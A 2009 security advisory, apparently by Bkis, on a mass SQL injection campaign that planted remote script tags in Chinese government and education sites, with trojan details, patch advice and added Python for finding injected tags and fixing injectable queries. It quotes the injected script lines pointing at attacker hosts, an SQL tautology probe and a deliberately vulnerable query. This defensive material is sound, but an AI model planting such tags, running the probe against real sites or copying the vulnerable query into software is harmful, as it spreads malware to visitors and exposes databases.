Recently, a new wave of massive SQL injection attacks has been detected by Bkis researchers. At the peak of the wave, according to Google search results, more than 187.000 websites were compromised.
Most of the infected websites are Chinese, including Chinese government websites under .gov.cn and education websites under .edu.cn...
Google search results
All of these websites have an SQL injection flaw, and their databases have been injected repeatedly with the following code: <script src=hxxp://wgwggg.cn:1/1.js></script>
(Update on 17 Dec 2009: According to our latest analysis, hackers have injected new code into more than 178.000 websites, as follows: <script src=hxxp://a.118cc.cn></script>. You can see the Google search results here.)
View source of an infected website with malicious script
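The injected tags have a fixed shape (an external script src, sometimes unquoted, sometimes with spaces around the "="), so a site owner can scan dumped database columns or saved page source for them before cleaning up. The following is an added example, not Bkis's or any affected site's own tooling: it flags script tags that point at the two hosts named in this post or at any host not on a site allowlist, and strips them from a column value. The regex, the allowlist parameter and the sample rows are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Hosts named in the post's two injected payloads (wgwggg.cn and a.118cc.cn).
KNOWN_INJECTED_HOSTS = {"wgwggg.cn", "a.118cc.cn"}

# Matches <script src=...></script> whether or not src is quoted and with
# optional whitespace around "=", which is how the injected tags appear.
SCRIPT_TAG_RE = re.compile(
    r"<script\s+src\s*=\s*['\"]?([^'\"\s>]+)['\"]?[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

def script_host(url):
    """Host of a script URL, or None for a relative (same-origin) src.
    urlsplit parses the netloc for any scheme followed by //, so the defanged
    hxxp:// form used in the post is handled like http://."""
    return urlsplit(url).hostname

def find_injected_scripts(text, allowed_hosts=()):
    """Return (host, tag) pairs for external script tags whose host is a
    known injected host or is not on the site's allowlist of script hosts."""
    flagged = []
    for match in SCRIPT_TAG_RE.finditer(text):
        host = script_host(match.group(1))
        if host is None:
            continue  # relative src: served by the site itself, not flagged
        if host in KNOWN_INJECTED_HOSTS or host not in allowed_hosts:
            flagged.append((host, match.group(0)))
    return flagged

def strip_injected_scripts(text, allowed_hosts=()):
    """Remove flagged script tags from a column value; everything else is kept."""
    def keep_or_drop(match):
        host = script_host(match.group(1))
        if host is None or (host in allowed_hosts and host not in KNOWN_INJECTED_HOSTS):
            return match.group(0)
        return ""
    return SCRIPT_TAG_RE.sub(keep_or_drop, text)

def scan_rows(rows, allowed_hosts=()):
    """Scan (row_id, column_value) pairs, e.g. dumped from a CMS text column,
    and report which rows carry injected script tags and from which hosts."""
    report = {}
    for row_id, value in rows:
        hits = find_injected_scripts(value, allowed_hosts)
        if hits:
            report[row_id] = sorted({host for host, _ in hits})
    return report

# Constructed sample rows imitating a CMS text column after the attack; the
# two script tags are the payloads reported in the post, the rest is made up.
SAMPLE_ROWS = [
    (1, "Welcome to our site.<script src=hxxp://wgwggg.cn:1/1.js></script>"),
    (2, "Opening hours: 8-17.<script src = hxxp://a.118cc.cn></script>"),
    (3, 'Contact us.<script src="/js/site.js"></script>'),
    (4, "Plain text with no script at all."),
]

if __name__ == "__main__":
    for row_id, hosts in scan_rows(SAMPLE_ROWS).items():
        print(f"row {row_id}: injected script from {', '.join(hosts)}")
    print(strip_injected_scripts(SAMPLE_ROWS[0][1]))
```

Run it against an export of every text column in the database rather than only the pages you happen to view: the mass injection writes the tag into many rows, and a single missed row re-infects visitors as soon as that content is rendered.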
When users visit these websites, the script is executed and silently loads hidden iframes containing exploit code from malicious websites, which then download malware to the users' computers.
Malicious code in .js file
The malicious websites use exploit code for the following vulnerabilities:
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002
A successful exploit silently downloads the file upload.css (detected by Bkav as W32.CSSExploit.Trojan) and installs it on the user's computer.
The virus W32.CSSExploit.Trojan has the following technical details:
- Drops the file %UserProfile%\[RandomName].drv
- Renames itself to "auto.exe" and copies itself to the %ProgramFiles%\Common Files\ folder
- Writes the registry key [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto] and registers the service DrvKiller to run the virus at Windows start-up
- Copies an "autorun.inf" file and itself to all drives in order to spread
- Changes the homepage to http://www.playbo[removed]ing.com.cn:8788/
- Installs a backdoor that allows the hacker to remotely control the computer
- Downloads and executes many online-game viruses and other malware on the infected computer
According to our analysis, the virus and the wave of attacks are suspected to be of Chinese origin.
We are still tracking this attack and performing further analysis.
Recommendations for prevention:
- Up to now, many websites remain unfixed. Administrators of these websites should quickly remove the malicious scripts injected into their databases and fix the websites' SQL injection flaws to prevent the next wave of attacks.
- Users should install the latest Microsoft and Adobe patches.
- Users should update their anti-virus software.
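Removing the injected rows does not help for long if the SQL injection flaw itself stays open, since the next wave simply writes the tag back. The following added example (not code from Bkis or from any affected site) shows the flaw in its simplest form beside the fix: a request parameter spliced into the SQL text versus the same lookup with a bound parameter. The in-memory SQLite table, the column names and the probe input are constructed assumptions; the same pattern applies to whatever database the site actually uses.

```python
import sqlite3

def build_sample_db():
    """In-memory SQLite stand-in for a site's database (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello visitors."), ("Notice", "Office closed on Friday.")],
    )
    return conn

def search_vulnerable(conn, title):
    """The flaw the post describes: the request parameter is spliced into the
    SQL text, so quote characters in it change the statement itself."""
    sql = "SELECT id, title FROM articles WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()

def search_fixed(conn, title):
    """The fix: a bound parameter is handed to the driver as data and is never
    parsed as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT id, title FROM articles WHERE title = ?", (title,)
    ).fetchall()

def compare(probe="x' OR '1'='1"):
    """Run one input through both versions; returns (vulnerable_rows, fixed_rows).
    The default probe is the textbook tautology, used only to show the difference."""
    conn = build_sample_db()
    return search_vulnerable(conn, probe), search_fixed(conn, probe)

if __name__ == "__main__":
    vulnerable_rows, fixed_rows = compare()
    print("vulnerable:", vulnerable_rows)  # the tautology matches every row
    print("fixed:     ", fixed_rows)       # treated as a literal title: no rows
```

With the bound parameter, the tautology is compared as a literal title and matches nothing; with string concatenation it becomes part of the WHERE clause and matches every row, which is the same mechanism that lets an attacker turn a search box into an UPDATE over the whole table. Every query that takes request input needs the second form, not only the ones that were seen being abused.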